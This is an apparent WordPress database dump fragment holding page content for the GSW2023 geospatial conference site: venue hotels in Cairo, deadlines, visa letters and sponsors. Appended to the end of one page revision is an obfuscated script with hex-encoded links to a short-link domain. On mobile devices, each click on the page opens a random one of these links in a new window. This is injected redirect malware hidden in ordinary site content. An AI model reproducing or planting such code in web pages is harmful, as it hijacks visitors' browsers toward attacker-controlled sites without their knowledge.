!important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-18 13:56:39','2023-06-18 13:56:39','',3066,'https://gsw2023.com/?p=4718',0,'revision','',0),
(4719,1,'2023-06-20 00:03:52','2023-06-20 00:03:52','','ESRI','','inherit','open','closed','','esri','','','2023-06-20 00:03:52','2023-06-20 00:03:52','',3066,'https://gsw2023.com/wp-content/uploads/2023/06/ESRI.jpg',0,'attachment','image/jpeg',0),
(4720,1,'2023-06-20 00:06:17','2023-06-20 00:06:17','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219507098{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><img class=\"alignnone wp-image-4719 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img 